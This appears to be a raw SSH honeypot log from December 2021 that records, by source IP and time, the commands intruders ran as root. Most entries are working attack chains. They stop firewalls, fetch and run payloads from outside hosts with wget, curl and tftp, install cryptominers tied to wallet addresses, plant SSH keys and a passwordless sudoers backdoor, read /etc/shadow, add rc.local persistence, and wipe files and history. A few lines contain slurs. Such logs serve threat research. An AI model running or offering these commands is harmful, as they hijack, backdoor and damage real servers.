reSuSEfirewall2 stop
wget -c http://45.207.43.129:8003/Linux2.6
chmod 777 Linux2.6
./Linux2.6

From 45.61.187.248 16-Dec-2021 08:03:24 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://137.220.194.92/sshd64.sh;curl -O http://137.220.194.92/sshd64.sh;chmod 777 sshd64.sh;sh sshd64.sh;rm -f sshd64.sh
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://137.220.194.92/sshd64.sh
curl -O http://137.220.194.92/sshd64.sh
chmod 777 sshd64.sh
sh sshd64.sh
rm -f sshd64.sh

From 198.98.55.228 16-Dec-2021 08:17:20 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://198.98.55.228:8003/QW.6;chmod 777 QW;./QW;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://198.98.55.228:8003/QW.6
chmod 777 QW
./QW
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://198.98.55.228:8003/QW.6;chmod 777 QW;./QW;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://198.98.55.228:8003/QW.6
chmod 777 QW
./QW

From 45.88.188.236 17-Dec-2021 06:31:06 ssh2 root
ls
w
lscpu
ls
nano test.pl
uname 
cat /etc/issue
cd /var/tmp
wget nasapaul.com/ninfo
wget nasapaul.com
wget nashttps://nasapaul.com/v.py

From 45.88.188.236 17-Dec-2021 07:38:22 ssh2 root
la
ls
cd /var/tmp
ls
ls
cd /
la
ls
cd
ls
ls /home
clear
apt-get
apt-get install nano
clear cd
cd /var
ls
lscpu
free -mt
wget

From 188.68.62.150 17-Dec-2021 07:50:09 ssh2 root
curl
apt instwll cir
apt insratall curl
apt-get install curl
curl nasapaul.com/v.py
cuel
curl
eoxit
exit

From 45.88.188.236 17-Dec-2021 11:41:25 ssh2 root
lscpu

From 62.231.94.91 17-Dec-2021 13:37:17 ssh2 root
clear
lscpu

From 62.231.94.91 17-Dec-2021 13:38:29 ssh2 root
curl
apt-get install curl
curl
bash
sudo su
su
help
cat /etcoers
cd /etc
ls
cat test.pl
cd Mail
ls -la
cd ..
ls -la
cat .bash_history
type test.pl
perl test.py
perl test.pl
python3
python
python
apt-get install python

From 185.56.80.65 17-Dec-2021 13:41:27 ssh2 root
python
ls
cd
ls
python
python3
py
clear
perl

From 195.3.147.47 17-Dec-2021 13:46:41 ssh2 root
cls
help
rpm2cpio
cpio
cls

From 185.243.218.50 17-Dec-2021 14:01:27 ssh2 root
uname -a
cd /etc
ls
ls /etc
ll ls
lcd .ssh
ls
cd .ssh ls
ls
pwd
ls /home
cd /home
ls
term
$TERM=xterm
exort
export
ww
w
python
py
perl
php
w
find
grep
etc/issue
etc 
cat /proc/cpuinfo
cat /proc/cpuinfo
cat /etc/issue
cat /etc/passwd
wget
wget nasapaul.com/ninfo -O file
wget nasapa-u
wget
wget -u

From 8.37.43.225 17-Dec-2021 14:05:07 ssh2 root
wget http://nasapaul.com/v.py
nbano
nano
edit
e
uname -a
uname

From 193.105.134.45 17-Dec-2021 15:53:50 ssh2 root
uname
ls
ls
vmware
list
h
help -h
uname
cd
ls
simpleirewall-stabl
clear

From 146.71.76.11 17-Dec-2021 15:59:02 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://stirileprotv.gq/fuckjewishpeople.sh; chmod 777 fuckjewishpeople.sh; sh fuckjewishpeople.sh; tftp stirileprotv.gq -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g stirileprotv.gq; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://stirileprotv.gq/fuckjewishpeople.sh
chmod 777 fuckjewishpeople.sh
sh fuckjewishpeople.sh
tftp stirileprotv.gq -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g stirileprotv.gq
chmod 777 tftp2.sh
sh tftp2.sh
rm -rf *

From 205.185.125.184 17-Dec-2021 19:21:16 ssh2 root
Exec sudo hive-passwd `hostname`; echo `hostname`; pkill Xorg; pkill x11vnc; pkill Hello; systemctl stop shellinabox; history -c
sudo hive-passwd `hostname`
echo `hostname`
pkill Xorg
pkill x11vnc
pkill Hello
systemctl stop shellinabox
history -c

From 35.192.179.181 17-Dec-2021 23:14:07 ssh2 root
Exec nproc;cat /etc/*-release |grep PRETTY_NAME
nproc
cat /etc/*-release |grep PRETTY_NAME

From 205.185.114.149 18-Dec-2021 13:42:30 ssh2 root
Exec rm x86_64; wget http://205.185.121.185/x86_64; chmod 777 *; ./x86_64 nigga; rm x86_64
rm x86_64
wget http://205.185.121.185/x86_64
chmod 777 *
./x86_64 nigga
rm x86_64

From 211.22.65.18 18-Dec-2021 16:42:48 ssh2 root
Exec uname -a;wget ftp://cpa:cpa@5.45.119.175/znoki.jpg ; perl znoki.jpg ; rm -rf zn* ; history -c
uname -a
wget ftp://cpa:cpa@5.45.119.175/znoki.jpg
perl znoki.jpg
rm -rf zn*
history -c

From 205.185.125.184 18-Dec-2021 18:06:22 ssh2 root
Exec sudo hive-passwd `hostname`; echo `hostname`; pkill Xorg; pkill x11vnc; pkill Hello; systemctl stop shellinabox; history -c
sudo hive-passwd `hostname`
echo `hostname`
pkill Xorg
pkill x11vnc
pkill Hello
systemctl stop shellinabox
history -c

From 167.99.41.232 18-Dec-2021 21:13:20 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://sekinarh.tk/sh; curl -O http://sekinarh.tk/sh; chmod 777 sh; sh sh; tftp sekinarh.tk -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g sekinarh.tk; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 sekinarh.tk .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://sekinarh.tk/sh
curl -O http://sekinarh.tk/sh
chmod 777 sh
sh sh
tftp sekinarh.tk -c get bins.sh
chmod 777 bins.sh
sh bins.sh
tftp -r .sh -g sekinarh.tk
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 sekinarh.tk .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *

From 137.220.194.15 19-Dec-2021 13:42:31 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://137.220.194.92/defender64.sh;curl -O http://137.220.194.92/defender64.sh;chmod 777 defender64.sh;sh defender64.sh;rm -f defender64.sh;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://137.220.194.92/defender64.sh
curl -O http://137.220.194.92/defender64.sh
chmod 777 defender64.sh
sh defender64.sh
rm -f defender64.sh
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://137.220.194.92/defender64.sh;curl -O http://137.220.194.92/defender64.sh;chmod 777 defender64.sh;sh defender64.sh;rm -f defender64.sh;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://137.220.194.92/defender64.sh
curl -O http://137.220.194.92/defender64.sh
chmod 777 defender64.sh
sh defender64.sh
rm -f defender64.sh

From 200.119.112.204 19-Dec-2021 20:19:21 ssh2 root
Exec echo "Uname: "`uname -a`;echo "ID: "`id`
echo "Uname: "`uname -a`
echo "ID: "`id`

From 220.167.103.107 20-Dec-2021 05:47:09 ssh2 root
ls
id
apt
lscpu

From 220.167.103.107 20-Dec-2021 05:49:33 ssh2 root
curl
apt install curl
curl
uname -a
yum
cat /etc/redhat-release
cat /etc/redhat-release
cat /proc/version
curl
screen -S xxx
apt install screen
screen -S xxx
apt-get install curl
curl

From 103.150.36.98 20-Dec-2021 05:52:51 ssh2 root
cd /etc/
ls
cd
ls

From 188.166.103.91 20-Dec-2021 08:47:42 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://sekinarh.tk/sh; curl -O http://sekinarh.tk/sh; chmod 777 sh; sh sh; tftp sekinarh.tk -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g sekinarh.tk; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 sekinarh.tk .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://sekinarh.tk/sh
curl -O http://sekinarh.tk/sh
chmod 777 sh
sh sh
tftp sekinarh.tk -c get bins.sh
chmod 777 bins.sh
sh bins.sh
tftp -r .sh -g sekinarh.tk
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 sekinarh.tk .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *

From 178.138.96.110 22-Dec-2021 16:03:32 ssh2 root
w
lscpu
ls -a
exit

From 161.35.201.142 23-Dec-2021 02:16:54 ssh2 root
Exec curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 44XKLDbSztdXqao2Rs2EFFLvdjsbRwYrP1FkqdqB91v1PohHdSSTjyeKQ4t6UMFXNdYpxkNhwpi9xTRmEsk6PeUSLHCfeLR
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 44XKLDbSztdXqao2Rs2EFFLvdjsbRwYrP1FkqdqB91v1PohHdSSTjyeKQ4t6UMFXNdYpxkNhwpi9xTRmEsk6PeUSLHCfeLR

From 178.138.96.110 23-Dec-2021 12:25:14 ssh2 root
w
lscpu
scp sucky me too
exit

From 137.220.194.15 23-Dec-2021 17:10:06 ssh2 root
Exec cd /tmp;wget -c http://205.185.117.54/sensi.sh;curl -O http://205.185.117.54/sensi.sh;chmod 777 sensi.sh;sh sensi.sh;rm -f sensi.sh;
cd /tmp
wget -c http://205.185.117.54/sensi.sh
curl -O http://205.185.117.54/sensi.sh
chmod 777 sensi.sh
sh sensi.sh
rm -f sensi.sh

From 188.166.103.91 23-Dec-2021 18:18:05 ssh2 root
Exec cd /tmp ; mkdir .x ; cd .x ; wget https://coxro.000webhostapp.com/xmrig ; chmod +x xmrig ; mv xmrig systemd ; ./systemd -o 37.187.95.110:443 -u 8ALdP9yTXenfNjgpm5TrRf7TGoBr8aUKU3kQcu7CLzfVJZYMXTohVb85GrRu7dy8PsTYrcisdG9LdMTmkuPRdZN7CnFsVWB -k --tls -p MinerCox -B ; echo DONE
cd /tmp
mkdir .x
cd .x
wget https://coxro.000webhostapp.com/xmrig
chmod +x xmrig
mv xmrig systemd
./systemd -o 37.187.95.110:443 -u 8ALdP9yTXenfNjgpm5TrRf7TGoBr8aUKU3kQcu7CLzfVJZYMXTohVb85GrRu7dy8PsTYrcisdG9LdMTmkuPRdZN7CnFsVWB -k --tls -p MinerCox -B
echo DONE

From 146.0.75.250 23-Dec-2021 18:53:02 ssh2 root
Exec cat /etc/issue
cat /etc/issue

From 222.186.133.160 24-Dec-2021 02:20:01 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.160:8090/wrnmm;chmod 777 wrnmm;./wrnmm;echo "cd /tmp/">>/etc/rc.local;echo "./wrnmm&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.160:8090/wrnmm
chmod 777 wrnmm
./wrnmm
echo "cd /tmp/">>/etc/rc.local
echo "./wrnmm
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.160:8090/wrnmm;chmod 777 wrnmm;./wrnmm;echo "cd /tmp/">>/etc/rc.local;echo "./wrnmm&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.160:8090/wrnmm
chmod 777 wrnmm
./wrnmm
echo "cd /tmp/">>/etc/rc.local
echo "./wrnmm
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 164.90.230.201 24-Dec-2021 03:06:49 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec wget https://www.nasapaul.com/ninfo; curl -O https://www.nasapaul.com/ninfo; chmod 777 *; ./ninfo
wget https://www.nasapaul.com/ninfo
curl -O https://www.nasapaul.com/ninfo
chmod 777 *
./ninfo

From 164.90.230.201 24-Dec-2021 03:07:00 ssh2 root
Exec wget https://www.nasapaul.com/ninfo; curl -O https://www.nasapaul.com/ninfo; chmod 777 *; ./ninfo
wget https://www.nasapaul.com/ninfo
curl -O https://www.nasapaul.com/ninfo
chmod 777 *
./ninfo
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 165.232.92.17 24-Dec-2021 05:13:24 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://greektaverna.tk/sh; curl -O http://greektaverna.tk/sh; chmod 777 sh; sh sh; tftp greektaverna.tk -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g greektaverna.tk; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 greektaverna.tk .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://greektaverna.tk/sh
curl -O http://greektaverna.tk/sh
chmod 777 sh
sh sh
tftp greektaverna.tk -c get bins.sh
chmod 777 bins.sh
sh bins.sh
tftp -r .sh -g greektaverna.tk
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 greektaverna.tk .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 165.232.92.17 24-Dec-2021 05:14:26 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://greektaverna.tk/sh; curl -O http://greektaverna.tk/sh; chmod 777 sh; sh sh; tftp greektaverna.tk -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g greektaverna.tk; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 greektaverna.tk .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://greektaverna.tk/sh
curl -O http://greektaverna.tk/sh
chmod 777 sh
sh sh
tftp greektaverna.tk -c get bins.sh
chmod 777 bins.sh
sh bins.sh
tftp -r .sh -g greektaverna.tk
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 greektaverna.tk .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *

From 112.65.206.11 24-Dec-2021 09:17:57 ssh2 root
Exec uname -a;id;cat /etc/shadow /etc/passwd;lscpu;chattr -ia /root/.ssh/*;wget http://highpower.sg/..... -O ~/.ssh/authorized_keys;chmod 600 ~/.ssh/authorized_keys;wget -qO - http://highpower.sg/...|perl;wget http://highpower.sg/.... -O /tmp/x;chmod +x /tmp/x;/tmp/x;mv /tmp/x /tmp/o;/tmp/o;rm -f /tmp/o;mkdir /sbin/.ssh;cp ~/.ssh/authorized_keys /sbin/.ssh;chown daemon.daemon /sbin/.ssh /sbin/.ssh/*;chmod 700 /sbin/.ssh;chmod 600 /sbin/.ssh/authorized_keys;echo 'daemon ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers
uname -a
id
cat /etc/shadow /etc/passwd
lscpu
chattr -ia /root/.ssh/*
wget http://highpower.sg/..... -O ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
wget -qO - http://highpower.sg/...|perl
wget http://highpower.sg/.... -O /tmp/x
chmod +x /tmp/x
/tmp/x
mv /tmp/x /tmp/o
/tmp/o
rm -f /tmp/o
mkdir /sbin/.ssh
cp ~/.ssh/authorized_keys /sbin/.ssh
chown daemon.daemon /sbin/.ssh /sbin/.ssh/*
chmod 700 /sbin/.ssh
chmod 600 /sbin/.ssh/authorized_keys
echo 'daemon ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers

From 209.141.54.15 24-Dec-2021 12:33:13 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://23.95.222.119/obins.sh; chmod 777 obins.sh; sh obins.sh; tftp 23.95.222.119 -c get otftp1.sh; chmod 777 otftp1.sh; sh otftp1.sh; tftp -r otftp2.sh -g 23.95.222.119; chmod 777 otftp2.sh; sh otftp2.sh; rm -rf obins.sh otftp1.sh otftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://23.95.222.119/obins.sh
chmod 777 obins.sh
sh obins.sh
tftp 23.95.222.119 -c get otftp1.sh
chmod 777 otftp1.sh
sh otftp1.sh
tftp -r otftp2.sh -g 23.95.222.119
chmod 777 otftp2.sh
sh otftp2.sh
rm -rf obins.sh otftp1.sh otftp2.sh
rm -rf *
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 209.141.54.15 24-Dec-2021 12:34:07 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec cd /tmp || cd /run || cd /; wget http://23.95.222.119/obins.sh; chmod 777 obins.sh; sh obins.sh; tftp 23.95.222.119 -c get otftp1.sh; chmod 777 otftp1.sh; sh otftp1.sh; tftp -r otftp2.sh -g 23.95.222.119; chmod 777 otftp2.sh; sh otftp2.sh; rm -rf obins.sh otftp1.sh otftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://23.95.222.119/obins.sh
chmod 777 obins.sh
sh obins.sh
tftp 23.95.222.119 -c get otftp1.sh
chmod 777 otftp1.sh
sh otftp1.sh
tftp -r otftp2.sh -g 23.95.222.119
chmod 777 otftp2.sh
sh otftp2.sh
rm -rf obins.sh otftp1.sh otftp2.sh
rm -rf *

From 222.186.133.160 25-Dec-2021 00:15:16 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.160:8090/wrnmm;chmod 777 wrnmm;./wrnmm;echo "cd /tmp/">>/etc/rc.local;echo "./wrnmm&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.160:8090/wrnmm
chmod 777 wrnmm
./wrnmm
echo "cd /tmp/">>/etc/rc.local
echo "./wrnmm
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 140.246.22.83 25-Dec-2021 23:21:43 ssh2 root
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://130.0.164.120/stx.sh | LC_ALL=en_US.UTF-8 bash -s Q0105002514d458b24187074c10c261fa33e4a5e97051ebf0153cf50e61ac52fa27b7188c7b1f0f
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://130.0.164.120/stx.sh | LC_ALL=en_US.UTF-8 bash -s Q0105002514d458b24187074c10c261fa33e4a5e97051ebf0153cf50e61ac52fa27b7188c7b1f0f

From 121.134.173.39 27-Dec-2021 07:41:53 ssh2 root
Exec grep -m 1 'model name' /proc/cpuinfo | cut -d: -f2 && grep -c ^processor /proc/cpuinfo && grep -m 1 'stepping' /proc/cpuinfo | cut -d: -f2 &&  grep -m 1 'bogomips' /proc/cpuinfo | cut -d: -f2 &&  uptime && uname -a
grep -m 1 'model name' /proc/cpuinfo | cut -d: -f2
grep -c ^processor /proc/cpuinfo
grep -m 1 'stepping' /proc/cpuinfo | cut -d: -f2
grep -m 1 'bogomips' /proc/cpuinfo | cut -d: -f2
uptime
uname -a

From 121.134.173.39 27-Dec-2021 08:58:35 ssh2 root
Exec grep -m 1 'model name' /proc/cpuinfo | cut -d: -f2 && grep -c ^processor /proc/cpuinfo && grep -m 1 'stepping' /proc/cpuinfo | cut -d: -f2 &&  grep -m 1 'bogomips' /proc/cpuinfo | cut -d: -f2 &&  uptime && uname -a
grep -m 1 'model name' /proc/cpuinfo | cut -d: -f2
grep -c ^processor /proc/cpuinfo
grep -m 1 'stepping' /proc/cpuinfo | cut -d: -f2
grep -m 1 'bogomips' /proc/cpuinfo | cut -d: -f2
uptime
uname -a

From 129.227.46.79 27-Dec-2021 14:16:59 ssh2 root
w
ls -a
ip a|grpe glo
ip a|grperep glo
cat /e hosts
last
cd
ps -aef
ls -a /home
ls -a /homew
ss

From 129.227.46.79 27-Dec-2021 14:23:02 ssh2 root
w
ls -a /hop

From 5.183.209.217 27-Dec-2021 14:51:48 ssh2 root
i piss on your .. so called honey shit server you fucking so called asshole wow what ......?????? wget my penis in your mouth and wget in the mouth of your
exist
exit

From 178.138.96.110 27-Dec-2021 14:52:48 ssh2 root
halt
reboot
/sbin/init 1
shutdown

From 185.215.167.218 27-Dec-2021 22:46:03 ssh2 root
Exec cat /etc/issue
cat /etc/issue

From 156.226.21.27 29-Dec-2021 08:48:14 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://156.226.21.27:1180/x86;chmod 777 x86;./x86;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://156.226.21.27:1180/x86
chmod 777 x86
./x86
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://156.226.21.27:1180/x86;chmod 777 x86;./x86;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://156.226.21.27:1180/x86
chmod 777 x86
./x86

From 185.205.201.248 30-Dec-2021 02:08:34 ssh2 root
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig

From 142.93.106.104 30-Dec-2021 03:27:47 ssh2 root
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
cat > /root/ifconfig

From 27.54.170.52 30-Dec-2021 03:36:34 ssh2 root
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig

From 206.189.13.19 30-Dec-2021 04:11:05 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://greektaverna.tk/sh; curl -O http://greektaverna.tk/sh; chmod 777 sh; sh sh; tftp greektaverna.tk -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g greektaverna.tk; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 greektaverna.tk .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://greektaverna.tk/sh
curl -O http://greektaverna.tk/sh
chmod 777 sh
sh sh
tftp greektaverna.tk -c get bins.sh
chmod 777 bins.sh
sh bins.sh
tftp -r .sh -g greektaverna.tk
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 greektaverna.tk .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig

From 178.138.96.110 30-Dec-2021 04:39:28 ssh2 root
w
lspcu
ucat /pro/cpuinfo
id richard
halt

From 212.192.241.163 30-Dec-2021 04:40:58 ssh2 root
Exec uname -s -v -n -r -m
uname -s -v -n -r -m
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig

From 190.255.34.220 31-Dec-2021 14:02:20 ssh2 root
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr